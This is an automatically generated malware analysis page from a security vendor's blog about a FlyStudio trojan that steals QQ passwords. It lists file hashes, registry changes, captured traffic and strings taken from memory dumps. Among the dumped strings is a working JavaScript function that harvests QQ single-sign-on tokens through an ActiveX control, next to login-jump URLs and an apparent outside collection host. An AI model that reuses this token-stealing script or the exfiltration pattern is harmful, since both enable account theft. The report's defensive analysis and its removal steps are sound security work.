Trojan.Win32.FlyStudio_c9f101613b

Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS) Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm The description has been automaticall...
Blog rating:4.5 out of5 with2 ratings

Trojan.Win32.FlyStudio_c9f101613b

by malwarelabrobot on March 18th, 2017 in Malware Descriptions.

Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: c9f101613b2b8c83e258f2cd9a13524e
SHA1: eb119de67c787b1608b5be7c1ebd697014918298
SHA256: c10839711810a1c3b722dcf54dc600e80572965e0ac51284fc22cf70e6ac130d
SSDeep: 24576:xgWheFi8AXOjJzcQ6vh8PhIL569TPaWEUbdSs uhwTS7:xgWhMAso5vh8PaQhEbTS
Size: 1466368 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-04-09 09:14:47
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3852

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\qlogin[1].htm (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJFV5BC8.txt (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\2409490842014111013118567[1].htm (41101 bytes)

Registry activity

The process %original file name%.exe:3852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "10 58 B5 F9 BB 9E D2 01"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1916x902x32(BGR 0)" = "31,31,31,31"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "10 58 B5 F9 BB 9E D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??
Product Name: ??QQ????????
Product Version: 1.0.0.0
Legal Copyright: ?? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: QQ????????
Comments: ??QQ??????!
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 646311 647168 4.51749 db562b266335aa493c9c76d7d1615a42
CODE 651264 338768 339968 4.57617 fb7dc939be45a9fe85f1d22181b2cd06
.rdata 991232 211654 212992 4.46426 69268c205267c12aa32bc861068a06ba
.data 1204224 324586 73728 3.39297 0d4ec8bc7d030d9715ca5e2a5d6882f8
DATA 1531904 69260 69632 5.14483 c25123d93051dc239b933062d22dc4e9
BSS 1601536 25785 28672 0 cf845a781c107ec1346e849c9dd1b7e8
.rsrc 1630208 87616 90112 3.72279 d919fcb65d0414798cb93a67989ff714

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://xui.ptlogin2.tencent-cloud.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252Fwww.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
hxxp://p21.tcdn.qq.com/ptlogin/ver/10202/js/xui.js?v=10007
hxxp://p21.tcdn.qq.com/ptlogin/v4/style/0/images/icons.gif
hxxp://blog.163.com/blog/static/2409490842014111013118567/
hxxp://blog.163.com/blog/static/2409490842015210103242809/
hxxp://skins12138.blog.163.com/blog/static/2409490842015210103242809/ 115.238.126.134
hxxp://imgcache.qq.com/ptlogin/ver/10202/js/xui.js?v=10007 203.205.158.38
hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif 203.205.158.38
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252Fwww.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0 203.205.142.186
hxxp://skins12138.blog.163.com/blog/static/2409490842014111013118567/ 115.238.126.134
dns.msftncsi.com 131.107.255.255
teredo.ipv6.microsoft.com 157.56.120.207
log.wtlogin.qq.com 183.61.38.241


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: X2S_Platform
Connection: keep-alive
Date: Fri, 17 Mar 2017 01:15:39 GMT
Cache-Control: max-age=2592000
Expires: Sun, 16 Apr 2017 01:15:39 GMT
Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT
Content-Type: image/gif
Content-Length: 7902
X-NWS-LOG-UUID: 7ec810b2-a5ec-41b3-a520-f3116d577d9b
Keep-Alive: timeout=60 
Vary:  Origin
X-Cache-Lookup: Hit From Disktank
GIF89as.r.................................................^....A......
.............! ............B.....}....................1)-t............
........j...........................................................c.
.>..p[E............z...........q.....u.....j.......................
..................Z.................b.................................
.................^................................!.......,....s.r....
.'..........X......'...............................X..................
...........X......................................)....Fz%.K.1.......*
\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F
..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\...
.... ^......#K.L.....3C..w..................@...c.....k..g....v.......
|....q ..{.....K...te...k..0...'....F......_.........O..............z.
...B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8..
..;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._
....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*...
.j.............".....j..<........... ....k...&....6...MD m...X...8.
...L.....;m.........n....n........ko...................0..$....7....G,
....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=
.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|
....}..w...>.............G....W....d....w.y......].`..80 6.........
....n............../....o|..$..........Q..U...GF0....w...../.....o....
.........3 ....a..X.!A!K.....0...@......L......:......'H..Z.......

<<< skipped >>>

GET /blog/static/2409490842014111013118567/ HTTP/1.1
Accept: */*
Referer: hXXp://skins12138.blog.163.com/blog/static/2409490842014111013118567/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: skins12138.blog.163.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Mar 2017 01:15:44 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hljLOMAig1kJBs5JAg==; expires=Sat, 17-Mar-18 01:15:44 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
b49..  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.. <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">.. <hea
d>.. <meta http-equiv="X-UA-Compatible" content="IE=7" />.
. <meta http-equiv="content-type" content="text/html;charset=gbk
"/>.. <meta http-equiv="content-style-type" content="text/css
"/>.. <meta http-equiv="content-script-type" content="text/ja
vascript"/>.. <meta name="version" content="neblog-1.0"/>.
. <script type="text/javascript">.. .. .. docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); .. document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');.. window.focus();.. window.getMusicT
imeStamp=function(){return '5dc9af78bbc20fbd0150e0675ff893a8';};..
.. //BLOG-647:....OS.............................. (function
(){.. window.setTimeout(function(){.. var _loginUserIc
on = document.getElementById('loginUserIcon');.. var _rsavata
rimg = document.getElementById('rsavatarimg');.. if(!!_loginU
serIcon){.. var _loaded1 = false;.. var _img1 =
new Image();.. _img1.onload = function(){..
_loaded1 = true;.. _img1.onload = null;.. };
.. _img1.src = _loginUserIcon.src;.. window.setT
imeout(function(){.. if(!_loaded1){..

<<< skipped >>>

GET /blog/static/2409490842015210103242809/ HTTP/1.1

Accept: */*
Referer: hXXp://skins12138.blog.163.com/blog/static/2409490842015210103242809/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: skins12138.blog.163.com
Cache-Control: no-cache
Cookie: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; usertrack=c 5 hljLOMAig1kJBs5JAg==


HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 17 Mar 2017 01:15:46 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
583..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<ht
ml xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>.. <met
a http-equiv="Content-type" content="text/html; charset=GBK">..
<meta name="robots" content="noindex"> .. <link href="http
://b.bst.126.net/style/common/error/404.css" type="text/css" rel="styl
esheet"/>..<title>........</title>..</head> ..<
;body>..<noscript><div>........................</div
></noscript>..<div class="g-doc">...<div class="g-hd
">....<div class="er-head bds0 bdwb bdc0">.....<h1 class="
icn0 icn0-0 bgc0"><a href="hXXp://blog.163.com/" class="notxt"&g
t;..........blog.163.com</a></h1>.....<div class="er-qu
ick fc1">......<a href="hXXp://blog.163.com/" class="fc1 ul">
........</a>...... | ......<a rel="nofollow" href="
hXXp://help.163.com/special/007525FT/blog.html" class="fc1 ul">....
</a>.....</div>....</div>...</div>...<div c
lass="g-bd">....<div class="er-cnt">.....<div class="er-fa
ce fs3 fc2">o. 0</div>.....<div class="er-detail">.....
.<h2 class="fs2 fc2">....</h2>......<div class="er-reas
on bgc1">.......<p class="fs1">..........................,...
.........................</p>.......<span class="er-arrow icn
0 icn0-1"></span>......</div>.....</div>....&

<<< skipped >>>

GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 17 Mar 2017 01:15:37 GMT
Content-Type: text/html
Content-Length: 5476
Connection: keep-alive
Server: QZHTTP-2.38.41
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=-542769849; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="C
ontent-Type" content="text/html; charset=utf-8"> <style type="t
ext/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Ari
al,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-h
eight:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0
0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_gray,.bt
n_select{border:0;color:#2473A2;width:103px;height:28px;padding-left:2
px;cursor:pointer;font-weight:700;font-size:14px}.btn_select{backgroun
d:url(//imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) -102px -1
30px no-repeat}.btn_gray{background:url(//imgcache.qq.com/ptlogin/v4/s
tyle/0/images/icons.gif) -102px -225px no-repeat}#login #list_uin img{
padding:7px;background:url(//imgcache.qq.com/ptlogin/v4/style/0/images
/icons.gif) 0 -329px no-repeat}#list_uin li{list-style:none;padding:0
0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-heigh
t:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;widt
h:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#logi
n p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.
x_lowLogin{padding:10px 0 0 28px;display:none}</style> <scri
pt>var g_begTime=new Date();..(function(){...window.onerror = funct
ion(msg,url,line){....var reportUrl = location.protocol == "https:

<<< skipped >>>

GET /ptlogin/ver/10202/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: X2S_Platform
Connection: keep-alive
Date: Fri, 17 Mar 2017 01:15:39 GMT
Cache-Control: max-age=604800
Expires: Fri, 24 Mar 2017 01:15:39 GMT
Last-Modified: Mon, 13 Mar 2017 08:35:12 GMT
Content-Type: application/x-javascript
Content-Length: 3460
Content-Encoding: gzip
X-NWS-LOG-UUID: 1cf7e165-ec73-49eb-b3dd-42d45240b1e9
Keep-Alive: timeout=60 
Vary:  Origin
X-Cache-Lookup: Hit From Disktank Gz
...........Z.w.... X....,..i..q\'..........#.....w........O i.#''.F..4
3..4.2.m.......K.D...E`'....0q.2..n}....2..E.g..oE$G.....=.Ca..w.j..M.
..F5F@....u...O\...z.@...f...]Q.m6.....frq}.K.<}w~.K....H5.......%L
Wj...X.\..=5.>....29$....S......>T.*v.....vG...`.{..t...v.....&l
t;.".N.:.(wb.G....:....:..gO............1...r.......9H..cT.._.....Z.n.
p.....&...8t.0P......C....LN........._..;G.j.@s...15q.K...9.....././..
/.|pH#2....$.n..p{e..K...{,H.A#G9ql..u..ms....Z..A$N...r......y...O...
Uks.9D..(..X.l|...u.%1..@k.be....4i..j..fs.2_..l..W]..X%....E.*;W.b...
...3.|.D7.Ki>.hE....[-..."F.....?QA.sP....bn&R6.L...=^.Br...-.C....
....&~../...q.4..m...b.............W...... ..G....'.].b..=.QLb.<..A
p..A....".Iw..<.}8.....j:3Mk.AH...Pa... ....................a..?b./
....c...[.c./...r... ..C.T....V,..D4..9...&h....#|......WB.q......Y.b.
9n...........j='..w.(v.h.E...j..G.........F]....y...\.j.Q.y@1.W.....0-
.mj.......Z..Z.o.....8?..\>../t..d$g&.J........#.....9.2....Qq.,t!.
e.E..38d:..I....'{Got<>..QU..#....&..8.sF...C....".P.&h.!u.u...&
gt;@.......D...{. .....E4...|4.~........K....I.4....5...c...J.Qj.P3hFM
i..K.....w.F......*v...V..`T.^.>......2m.h.......p`(i..&2.-5..~..m.
.C..g...\...2n....t1.S.@...d.1...6..crw%..z.[.V.......OR2`...i..J.3ea.
1..................s..R.^.Q.p.d.R.s..k...c...........e...6F.!.'0.>.
b.|..x.4.|.4.^%`..Gf.=3.6...2O._.. 3n....:d...FG..Fa.Q...f....A.....^^
.N.L..~....bJ.J..d4.Gt@3..4.Z..e.j. ...Z<..g...$..-.../J. .......3.
]......e..I$7.q.S*t..t...../..KK.....x ;..C.e 7.....-P/.....p./$&

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3852:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
MaxKeySize
Invalid key size
%UUUU1E
%UUUU3
5 passes)
1.2.3
DB00735E-CFFB-47E6-B060-BB0D74008B7A
94-401@163.com
Hw2.Hw
wininet.dll
ole32.dll
user32.dll
gdi32.dll
atl.dll
shlwapi.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
ShellExecuteA
&scope=0&view=1&daylist=undefined&uinlist=undefined&gid=&flag=1&filter=all&applist=all&refresh=0&firstGetGroup=0&icServerTime=1364288778&mixnocache=0&scene=0&begintime=0&count=15&dayspac=0&sidomain=cnc.qzonestyle.gtimg.cn&g_tk=
hXXp://ic2.s6.qzone.qq.com/cgi-bin/feeds/feeds2_html_more?uin=
key:'(.*?)',
showEbtn:'',
nickname:'(.*?)',
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
/mood/
.1&curkey=http://user.qzone.qq.com/
&unikey=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
0@hXXp://taotao.qq.com/cgi-bin/emotion_cgi_addcomment_ugc?g_tk=
&pfid=2&qz_ver=8&appcanvas=0&qz_style=1¶ms=&entertime=1382746831390&canvastype=&uin=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/mood_v6/html/index.html?mood#uin=
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
782843836
2904593
hXXp://ui.ptlogin2.qq.com/cgi-bin/login?appid=549000912&s_url=hXXp://qun.qzone.qq.com/group&style=12.com
ui.ptlogin2.qq.com
skey=@
Wp.Iw
A.zkt@
5p|%U
ù'p
hXXp://skins12138.blog.163.com/blog/static/2409490842014111013118567/
hXXp://skins12138.blog.163.com/blog/static/2409490842015210103242809/
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
WEBT
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qzone_sig=1&ptopt=1
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
skey=
&Btn=提交
hXXp://0cmz.xyz/index.php
VBScript.RegExp
@wininet.dll
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
GetProcessHeap
WinExec
GetCPInfo
GetKeyState
GetKeyboardType
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
oledlg.dll
WSOCK32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
(*.htm;*.html)|*.htm;*.html
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
VVV.dywt.com.cn
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hljLOMAig1kJBs5JAg==; expires=Sat, 17-Mar-18 01:15:44 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
kins12138.blog.163.com/blog/static/2409490842014111013118567/
c:\%original file name%.exe
*.yUW
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
#include "l.chs\afxres.rc" // Standard components
1, 0, 6, 6
- Skin.dll
(*.*)
1.0.0.0

%original file name%.exe_3852_rwx_10000000_0003F000:

`.rsrc
L$(h%f
SSh0j
Gw2.Hw
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

